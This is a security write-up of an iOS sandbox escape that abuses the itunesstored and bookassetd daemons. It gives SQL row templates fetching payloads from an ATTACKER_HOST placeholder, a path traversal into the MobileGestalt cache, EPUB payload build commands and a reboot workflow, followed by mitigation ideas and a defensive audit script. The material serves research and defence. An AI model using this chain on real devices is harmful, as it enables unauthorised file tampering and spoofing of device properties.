itunesstored & bookassetd Sandbox Escape


Overview

Recent research shows that two pre-installed iOS daemons, itunesstored (the downloads manager) and bookassetd (the Books / iBooks asset manager), blindly trust user-writable SQLite metadata. By planting crafted downloads.28.sqlitedb and BLDatabaseManager.sqlite files plus a minimal EPUB archive, an attacker who can write under /var/mobile/Media/ can coerce these daemons into arbitrary file writes across most mobile-owned paths inside /private/var/. The primitives survive reboots and let you manipulate system-group caches such as systemgroup.com.apple.mobilegestaltcache to spoof device properties or persist configuration.

Key characteristics:

  • Works on devices up to at least iOS 26.2b1 (tested on iPhone 12 / iOS 26.0.1).
  • Writable targets include SystemGroup caches, /private/var/mobile/Library/FairPlay, /private/var/mobile/Media, and other mobile-owned files. Writes to root-owned files fail.
  • Requires only AFC-level access (USB file copy) or any foothold that lets you replace the targeted SQLite DBs and upload payloads.

Threat Model & Requirements

  1. Local filesystem access to /var/mobile/Media/Downloads/ and /var/mobile/Media/Books/ (via AFC clients such as 3uTools, i4.cn, or afcclient over USB, or any prior compromise).
  2. An HTTP server hosting the attacker files (BLDatabaseManager.sqlite, iTunesMetadata.plist, crafted EPUB) exposed through URLs such as https://ATTACKER_HOST/fileprovider.php?type=....
  3. The ability to reboot the device several times so that each daemon reloads its database.
  4. Knowledge of the Books system-group UUID so that the Stage 1 write lands in the correct container (found via syslog).

Stage 1 – Abusing downloads.28.sqlitedb via itunesstored

itunesstored processes /var/mobile/Media/Downloads/downloads.28.sqlitedb. The asset table stores URL + destination metadata and is treated as trusted input. Crafting a row that points at an attacker URL and sets local_path to .../Documents/BLDatabaseManager/BLDatabaseManager.sqlite inside the Books SystemGroup causes itunesstored to download the Books database at boot and overwrite it with attacker content.

Finding the Books SystemGroup UUID

  1. Collect a syslog archive with pymobiledevice3: pymobiledevice3 syslog collect logs.logarchive
  2. Open logs.logarchive in Console.app and search for bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite.
  3. Note <UUID> and substitute it into the SQL payload.

Malicious asset row

Stage 1 INSERT template:

```sql
INSERT INTO "main"."asset" (
  "pid","download_id","asset_order","asset_type","bytes_total",
  "url","local_path","destination_url","path_extension","retry_count",
  "http_method","initial_odr_size","is_discretionary","is_downloaded",
  "is_drm_free","is_external","is_hls","is_local_cache_server",
  "is_zip_streamable","processing_types","video_dimensions",
  "timeout_interval","store_flavor","download_token","blocked_reason",
  "avfoundation_blocked","service_type","protection_type",
  "store_download_key","etag","bytes_to_hash","hash_type","server_guid",
  "file_protection","variant_id","hash_array","http_headers",
  "request_parameters","body_data","body_data_file_path","sinfs_data",
  "dpinfo_data","uncompressed_size","url_session_task_id"
) VALUES (
  1234567890,6936249076851270150,0,'media',NULL,
  'https://ATTACKER_HOST/fileprovider.php?type=sqlite',
  '/private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite',
  NULL,'epub',6,'GET',NULL,0,0,0,1,0,0,0,0,
  NULL,60,NULL,466440000,0,0,0,0,'',NULL,NULL,0,
  NULL,NULL,NULL,X'62706c6973743030a1015f1020...',NULL,NULL,NULL,NULL,NULL,NULL,0,1
);
```

Fields that matter:

  • url: attacker-controlled endpoint that returns the malicious BLDatabaseManager.sqlite.
  • local_path: the Books system-group BLDatabaseManager.sqlite file located above.
  • Control flags: keep the defaults (asset_type='media', path_extension='epub', booleans set to 0/1 as in the template) so the daemon accepts the task.

Deployment

  1. Remove stale /var/mobile/Media/Downloads/* entries to avoid races.
  2. Replace downloads.28.sqlitedb with the crafted DB via AFC.
  3. Reboot → itunesstored downloads the Stage 2 database and creates /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
  4. Copy that plist to /var/mobile/Media/Books/iTunesMetadata.plist; Stage 2 expects it at that location.

Stage 2 – Abusing BLDatabaseManager.sqlite via bookassetd

bookassetd has broader filesystem entitlements and trusts the ZBLDOWNLOADINFO table. By inserting a fake purchase row that references attacker URLs and carries a traversal in ZPLISTPATH, the daemon downloads your EPUB to /var/mobile/Media/Books/asset.epub and later unpacks metadata into any mobile-owned path reachable through ../../.. escape sequences.

Malicious ZBLDOWNLOADINFO row

Stage 2 INSERT template:

```sql
INSERT INTO "ZBLDOWNLOADINFO" (
  "Z_PK","Z_ENT","Z_OPT","ZACCOUNTIDENTIFIER","ZCLEANUPPENDING",
  "ZFAMILYACCOUNTIDENTIFIER","ZISAUTOMATICDOWNLOAD","ZISLOCALCACHESERVER",
  "ZISPURCHASE","ZISRESTORE","ZISSAMPLE","ZISZIPSTREAMABLE",
  "ZNUMBEROFBYTESTOHASH","ZPERSISTENTIDENTIFIER","ZPUBLICATIONVERSION",
  "ZSERVERNUMBEROFBYTESTOHASH","ZSIZE","ZSTATE","ZSTOREIDENTIFIER",
  "ZSTOREPLAYLISTIDENTIFIER","ZLASTSTATECHANGETIME","ZPURCHASEDATE",
  "ZSTARTTIME","ZARTISTNAME","ZARTWORKPATH","ZASSETPATH",
  "ZBUYPARAMETERS","ZCANCELDOWNLOADURL","ZCLIENTIDENTIFIER",
  "ZCOLLECTIONARTISTNAME","ZCOLLECTIONTITLE","ZDOWNLOADID",
  "ZDOWNLOADKEY","ZENCRYPTIONKEY","ZEPUBRIGHTSPATH","ZFILEEXTENSION",
  "ZGENRE","ZHASHTYPE","ZKIND","ZMD5HASHSTRINGS","ZORIGINALURL",
  "ZPERMLINK","ZPLISTPATH","ZSALT","ZSUBTITLE","ZTHUMBNAILIMAGEURL",
  "ZTITLE","ZTRANSACTIONIDENTIFIER","ZURL","ZRACGUID","ZDPINFO",
  "ZSINFDATA","ZFILEATTRIBUTES"
) VALUES (
  1,2,3,0,0,0,0,'',NULL,NULL,NULL,NULL,
  0,0,0,NULL,4648,2,'765107108',NULL,
  767991550.119197,NULL,767991353.245275,NULL,NULL,
  '/private/var/mobile/Media/Books/asset.epub',
  'productType=PUB&salableAdamId=765107106&...',
  'https://p19-buy.itunes.apple.com/...',
  '4GG2695MJK.com.apple.iBooks','Sebastian Saenz','Cartas de Amor a la Luna',
  '../../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library',
  NULL,NULL,NULL,NULL,'Contemporary Romance',NULL,'ebook',NULL,NULL,NULL,
  '/private/var/mobile/Media/Books/iTunesMetadata.plist',NULL,
  'Cartas de Amor a la Luna','https://ATTACKER_HOST/fileprovider.php?type=gestalt',
  'Cartas de Amor a la Luna','J19N_PUB_190099164604738',
  'https://ATTACKER_HOST/fileprovider.php?type=gestalt2',NULL,NULL,NULL,NULL
);
```

Important fields:

  • ZASSETPATH: on-disk EPUB location controlled by the attacker.
  • ZURL/ZPERMLINK: attacker URLs hosting the EPUB and the additional plist.
  • ZPLISTPATH: ../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library – the path traversal base that is prepended to files extracted from the EPUB. Adjust the traversal depth to reach the desired SystemGroup target.
  • Purchase metadata (ZSTOREIDENTIFIER, names, timestamps) mimics valid entries so the daemon does not reject the row.

After copying the malicious DB into /private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite (courtesy of Stage 1) and rebooting twice, bookassetd will (1) download the EPUB, (2) process it and write the derived plist under the traversed path.

Building the EPUB payload

bookassetd respects the EPUB ZIP format: mimetype must be the first, uncompressed entry. To map EPUB content onto the MobileGestalt cache, build a directory tree that mirrors the desired path relative to ZPLISTPATH.

Caches/
├── mimetype
└── com.apple.MobileGestalt.plist

Create the archive:

```bash
zip -X0 hax.epub Caches/mimetype
zip -Xr9D hax.epub Caches/com.apple.MobileGestalt.plist
```

  • mimetype normally contains the literal application/epub+zip.
  • Caches/com.apple.MobileGestalt.plist holds the attacker-controlled payload that will land at .../Library/Caches/com.apple.MobileGestalt.plist.

Orchestration Workflow

  1. Prepare the files on the attacker HTTP server and craft both SQLite DBs with host-/UUID-specific values.
  2. Replace downloads.28.sqlitedb on the device and reboot → Stage 1 downloads the malicious BLDatabaseManager.sqlite and writes /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
  3. Copy iTunesMetadata.plist to /var/mobile/Media/Books/iTunesMetadata.plist (repeat if the daemon removes it).
  4. Reboot again → bookassetd downloads asset.epub into /var/mobile/Media/Books/ using the Stage 2 metadata.
  5. Reboot a third time → bookassetd processes the downloaded asset, follows ZPLISTPATH, and writes the EPUB contents into the targeted SystemGroup path (e.g. com.apple.MobileGestalt.plist).
  6. Verify by reading the overwritten plist or by observing that MobileGestalt-derived properties (model identifier, activation flags, etc.) change accordingly.

The same pattern lets you drop files into other mobile-owned caches, such as FairPlay state or persistence directories, enabling silent tampering without a kernel exploit.

Tooling & Operational Notes

  • pymobiledevice3 syslog collect logs.logarchive – extracts log archives to discover the Books SystemGroup UUID.
  • Console.app – filter for bookassetd [Database]: Store is at ... to recover the exact container path.
  • AFC clients (afcclient, 3uTools, i4.cn) – push/pull SQLite DBs and plist files over USB without a jailbreak.
  • zip – enforces the EPUB ordering constraints when packing payloads.
  • Public PoC – https://github.com/hanakim3945/bl_sbx contains base SQLite/EPUB templates you can adapt.

Detection & Mitigation Ideas

  • Treat downloads.28.sqlitedb and BLDatabaseManager.sqlite as untrusted input: validate that local_path / ZPLISTPATH stay inside approved sandboxes and reject fully qualified paths or traversal tokens.
  • Monitor for AFC writes that replace these databases, or for unexpected downloads initiated by itunesstored / bookassetd shortly after boot.
  • Harden bookassetd's unpacking step to resolve the output destination with realpath() and ensure it cannot escape the Books container before any file is written.
  • Restrict AFC / USB file-copy channels, or require user interaction before allowing replacement of the Books/iTunes metadata files.
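To make the first and third bullets concrete, here is an added audit script for both databases (example code written for this page, not part of the original write-up or of the bl_sbx PoC). It assumes only the column names the page shows (asset.url, asset.local_path, ZBLDOWNLOADINFO.ZPLISTPATH), builds a constructed in-memory copy of the two tables with one benign and one crafted row each, and applies an assumed policy (one allowed write root per daemon, a trusted download-host suffix) that a real hardening change would need to confirm against the daemons' actual behaviour.

```python
"""Audit helper: flag asset / ZBLDOWNLOADINFO rows whose destinations escape
their daemon's container or whose download host is not trusted.

Added example for this page; the column names come from the page, the policy
values below are assumptions.
"""
import posixpath
import sqlite3
from typing import List, Optional
from urllib.parse import urlsplit

# Assumed policy: the only directory each daemon should write to on behalf of a row.
ALLOWED_ROOTS = {
    "asset.local_path": "/private/var/mobile/Media/Downloads",
    "ZBLDOWNLOADINFO.ZPLISTPATH": "/private/var/mobile/Media/Books",
}
# Assumed policy: hosts the daemons are expected to fetch content from.
TRUSTED_HOST_SUFFIXES = (".apple.com",)


def resolve_under(root: str, candidate: str) -> Optional[str]:
    """Return the normalised absolute path if `candidate` stays inside `root`, else None.

    Relative values are interpreted relative to `root`; absolute values are taken
    as given. Both a ".." traversal and a fully qualified path into another
    container end up outside `root` and are rejected. normpath is purely lexical;
    inside the daemon the same check should be repeated on realpath() of the
    final target so that symlinks cannot redirect the write.
    """
    joined = candidate if candidate.startswith("/") else posixpath.join(root, candidate)
    normalised = posixpath.normpath(joined)
    root_norm = posixpath.normpath(root)
    if normalised == root_norm or normalised.startswith(root_norm + "/"):
        return normalised
    return None


def host_is_trusted(url: str) -> bool:
    """True when the URL's host is one of the assumed trusted suffixes."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == s.lstrip(".") or host.endswith(s) for s in TRUSTED_HOST_SUFFIXES)


def audit(conn: sqlite3.Connection) -> List[str]:
    """Return one finding per suspicious value found in either table."""
    findings: List[str] = []
    for pid, url, local_path in conn.execute("SELECT pid, url, local_path FROM asset"):
        if resolve_under(ALLOWED_ROOTS["asset.local_path"], local_path) is None:
            findings.append(f"asset pid={pid}: local_path escapes Downloads: {local_path}")
        if not host_is_trusted(url):
            findings.append(f"asset pid={pid}: untrusted download host: {url}")
    for pk, plist_path in conn.execute("SELECT Z_PK, ZPLISTPATH FROM ZBLDOWNLOADINFO"):
        if resolve_under(ALLOWED_ROOTS["ZBLDOWNLOADINFO.ZPLISTPATH"], plist_path) is None:
            findings.append(f"ZBLDOWNLOADINFO Z_PK={pk}: ZPLISTPATH escapes Books: {plist_path}")
    return findings


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for the two databases: one benign and one crafted row each.

    Only the audited columns are modelled; the crafted values mirror the
    templates shown on the page, the benign ones are invented for contrast.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE asset (pid INTEGER, url TEXT, local_path TEXT)")
    conn.execute("CREATE TABLE ZBLDOWNLOADINFO (Z_PK INTEGER, ZPLISTPATH TEXT)")
    conn.executemany("INSERT INTO asset VALUES (?, ?, ?)", [
        (1, "https://p19-buy.itunes.apple.com/example", "book.epub"),  # benign (constructed)
        (1234567890, "https://ATTACKER_HOST/fileprovider.php?type=sqlite",
         "/private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite"),
    ])
    conn.executemany("INSERT INTO ZBLDOWNLOADINFO VALUES (?, ?)", [
        (1, "iTunesMetadata.plist"),  # benign (constructed)
        (2, "../../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    for line in audit(build_sample_db()):
        print(line)
```

Run against the sample DB the script reports three findings: the crafted asset row is flagged twice (destination outside Downloads, untrusted host) and the crafted ZBLDOWNLOADINFO row once (ZPLISTPATH resolves outside Books); both benign rows pass. Pointing `audit()` at a copy of the real databases pulled over AFC (`sqlite3.connect(path)`) gives a quick post-boot integrity check, and `resolve_under()` is the shape of check the daemons themselves would need, with realpath() on the final target, before writing.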
